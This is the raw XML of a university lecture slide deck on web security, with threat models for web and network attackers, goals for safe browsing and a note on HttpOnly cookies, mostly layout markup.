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80"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId81"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="275" r:id="rId2"/>
    <p:sldId id="303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6" r:id="rId52"/>
    <p:sldId id="397" r:id="rId53"/>
    <p:sldId id="398" r:id="rId54"/>
    <p:sldId id="399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3" r:id="rId69"/>
    <p:sldId id="414" r:id="rId70"/>
    <p:sldId id="415" r:id="rId71"/>
    <p:sldId id="416" r:id="rId72"/>
    <p:sldId id="417" r:id="rId73"/>
    <p:sldId id="418" r:id="rId74"/>
    <p:sldId id="419" r:id="rId75"/>
    <p:sldId id="420" r:id="rId76"/>
    <p:sldId id="421" r:id="rId77"/>
    <p:sldId id="422" r:id="rId78"/>
    <p:sldId id="347" r:id="rId7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6DD05-F287-4CF1-AA8B-235E9571F619}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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86C31-6830-4FB3-92E2-4CBE013FB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1889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637B8-6CFC-40D3-B47E-FF2FFF8BE109}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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50FFC-271D-4C6E-AD6F-E4E2AA330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5069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50FFC-271D-4C6E-AD6F-E4E2AA3301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512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788"/>
            <a:fld id="{904A546D-4F7E-42A3-A401-2722DE26BA08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>28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75916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788"/>
            <a:fld id="{15E55E8C-DFFB-430A-AEF8-5ADB56F4FBCE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>29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34853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788"/>
            <a:fld id="{CFD1C102-9507-4FA8-81A7-7297927106E6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>30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17962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788"/>
            <a:fld id="{D605EE26-1CB0-4E2A-B84D-C747D8E5CCE1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>31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97704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788"/>
            <a:fld id="{568ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="966788"/>
              <a:t>32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165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788"/>
            <a:fld id="{673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>33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53263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788"/>
            <a:fld id="{53FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>36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49520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6381CE-79EE-4B91-90B2-53CD43D08136}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38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99400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846BF2-BDC9-4A46-8C6B-5725797173F9}" type="slidenum">
              <a:rPr lang="en-US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91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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="479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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>52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36456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50FFC-271D-4C6E-AD6F-E4E2AA3301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8354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7108" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4143881" y="9119857"/>
            <a:ext cx="3169705" cy="479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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{5DCFB259-B646-486A-8557-3CA54B84E6E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>53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737273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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="479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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>54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15688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ED8FEA-7778-4676-91F7-45872229C0A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70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Personalization:  NY Times says “Hi Fred”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2896656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F24E3-66CE-4EAD-839D-070122A087E4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142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HttpOnly in IE can be written to by script, but cannot be read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1772585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ACE478-A8F0-4A48-9704-0207FAF3866A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134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HttpOnly in IE can be written to by script, but cannot be read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1331280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63613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63613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63613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63613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9636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4BB7810A-5045-442B-95AC-96A1A1E744B7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/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470970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1DD2A54E-7F4A-4F8D-A2BF-E3597AA6488F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="965200"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              <a:cs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4291168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788"/>
            <a:fld id="{87D655A4-9836-418D-A32F-B201A5C1FF76}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>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02602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D8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"/>
              <a:t>11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49136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6C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"/>
              <a:t>12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08344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5B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18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82953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788"/>
            <a:fld id="{C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>22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4480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46E93-EF28-485B-90F5-88C248C7A09D}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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210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65974-4FF0-4134-A6AD-284EA18576BC}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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7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8360A-FBFC-494E-BA68-2C0117FE93EC}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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543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04800"/>
            <a:ext cx="103632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7600" y="1524000"/>
            <a:ext cx="52324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524000"/>
            <a:ext cx="52324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64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C713B-9564-4968-8B43-A8B00774F6ED}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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60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D438-D3F9-4D39-95AE-94A2DB62BEA1}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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32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D177-DD9B-40F9-97DB-DA4D6D7374F5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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141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241F-A309-4E07-A94F-926BB93DD78E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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877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F8FEF-B9E3-4679-BD47-6763FED1A4E1}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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937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8CE93-F87E-421F-8B51-5BB3504D8593}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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63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4D9A-F08E-4F8B-8232-D480665B2BD7}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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99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07912-EB37-48CE-88D4-A49370356A3D}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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408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3C498-A486-4A9F-B19E-763DE2CA6EC1}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2016/5/22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18F41-E0A9-4F72-861C-BE4AABE77B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99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js/js_output.asp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js/js_output.asp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p/browsersec/wiki/Part2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/browsersec/wiki/Part1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5.png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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1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07031"/>
          </a:xfr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/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Computer Security and Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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407032"/>
            <a:ext cx="9144000" cy="5450967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Lecturer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Zhou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Peng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Ph.D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> in Computer Network Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pzhou@shu.edu.cn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0" y="1407032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175" y="1720908"/>
            <a:ext cx="2343150" cy="3324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692" y="1720909"/>
            <a:ext cx="2513945" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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60904" y="2859800"/>
            <a:ext cx="15560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/>
              <a:t>Lecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0"/>
              <a:t>5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25961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web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Safely browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Support secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should be able to achieve the same security properties as stand-alone applications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20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52601" y="1905000"/>
            <a:ext cx="8753475" cy="4343400"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8753475" cy="4343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2895600" y="1976438"/>
              <a:ext cx="3276600" cy="3910012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339" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2895600" y="3981450"/>
              <a:ext cx="533400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6699FF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40" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5638800" y="1981200"/>
              <a:ext cx="533400" cy="2000250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC3300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14341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7162800" y="1905000"/>
              <a:ext cx="1703388" cy="235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2" name="Picture 8" descr="Alice _8885 by Disney-Grandpa."/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3886200"/>
              <a:ext cx="1600200" cy="236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3" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6705600" y="4286250"/>
              <a:ext cx="2276475" cy="1477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/>
                <a:t>Web Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Sets up malicious site visited by victim; no control of network</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14344" name="TextBox 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="609599" y="3549134"/>
              <a:ext cx="63671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Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14345" name="Right Arrow 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="4343400"/>
              <a:ext cx="685800" cy="45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699FF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46" name="Right Arrow 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2057400" y="5257800"/>
              <a:ext cx="685800" cy="45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699FF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47" name="Right Arrow 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6324600" y="2362200"/>
              <a:ext cx="685800" cy="45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3300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48" name="Right Arrow 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6324600" y="3276600"/>
              <a:ext cx="685800" cy="45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3300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14349" name="Picture 11" descr="CompaqAlphaServerES4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00600" y="2228850"/>
              <a:ext cx="1155700" cy="142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50" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="2619375"/>
              <a:ext cx="8511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System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Cloud Callout 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3981450"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -186846"/>
                <a:gd name="adj2" fmla="val 43949"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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4352" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="30" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4919662" y="3748088"/>
              <a:ext cx="492125" cy="12065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53" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4256088" y="4743450"/>
              <a:ext cx="457200" cy="17145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</p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14354" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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48000" y="4252913"/>
              <a:ext cx="1436688" cy="143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Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="9144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sz="4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Web security threat model</a:t>
            </a:r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91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52600" y="1905000"/>
            <a:ext cx="8839200" cy="4343400"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8839200" cy="4343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2895600" y="1976438"/>
              <a:ext cx="3276600" cy="3910012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315" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2895600" y="3981450"/>
              <a:ext cx="533400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6699FF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316" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5638800" y="1976438"/>
              <a:ext cx="533400" cy="2157412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC3300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13317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7162800" y="1905000"/>
              <a:ext cx="1703388" cy="235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18" name="Picture 8" descr="Alice _8885 by Disney-Grandpa."/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3886200"/>
              <a:ext cx="1600200" cy="236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9" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6927850" y="4286250"/>
              <a:ext cx="2139950" cy="1477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Network Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Intercepts and controls network communication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13320" name="TextBox 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="710343" y="3562112"/>
              <a:ext cx="63671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Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="Right Arrow 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="4343400"/>
              <a:ext cx="685800" cy="45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699FF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322" name="Right Arrow 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2057400" y="5257800"/>
              <a:ext cx="685800" cy="45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699FF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323" name="Right Arrow 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6324600" y="2362200"/>
              <a:ext cx="685800" cy="45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3300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324" name="Right Arrow 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6324600" y="3276600"/>
              <a:ext cx="685800" cy="45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3300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13325" name="Picture 11" descr="CompaqAlphaServerES4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76600" y="2255838"/>
              <a:ext cx="1155700" cy="1420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26" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4954588" y="4743450"/>
              <a:ext cx="8511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System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13327" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="4432300" y="2967038"/>
              <a:ext cx="488950" cy="303212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328" name="Straight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4242594" y="3899694"/>
              <a:ext cx="1028700" cy="1001712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2" name="Cloud Callout 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2778125"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -200975"/>
                <a:gd name="adj2" fmla="val 175085"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent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3330" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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48000" y="4252913"/>
              <a:ext cx="1436688" cy="143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Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="9144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sz="4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Network security threat model</a:t>
            </a:r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23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90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52600" y="76200"/>
            <a:ext cx="8861426" cy="3631170"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8753475" cy="4856404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2895600" y="1976438"/>
              <a:ext cx="3276600" cy="3910012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2895600" y="3981450"/>
              <a:ext cx="533400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6699FF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5638800" y="1981200"/>
              <a:ext cx="533400" cy="2000250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC3300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7" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7162800" y="1905000"/>
              <a:ext cx="1703388" cy="235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8" descr="Alice _8885 by Disney-Grandpa."/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3886200"/>
              <a:ext cx="1600200" cy="236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11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6705600" y="4286251"/>
              <a:ext cx="2276475" cy="8644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dirty="0"/>
                <a:t>Web Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp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>
              <a:off x="533400" y="6267451"/>
              <a:ext cx="628956" cy="4939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Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Right Arrow 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
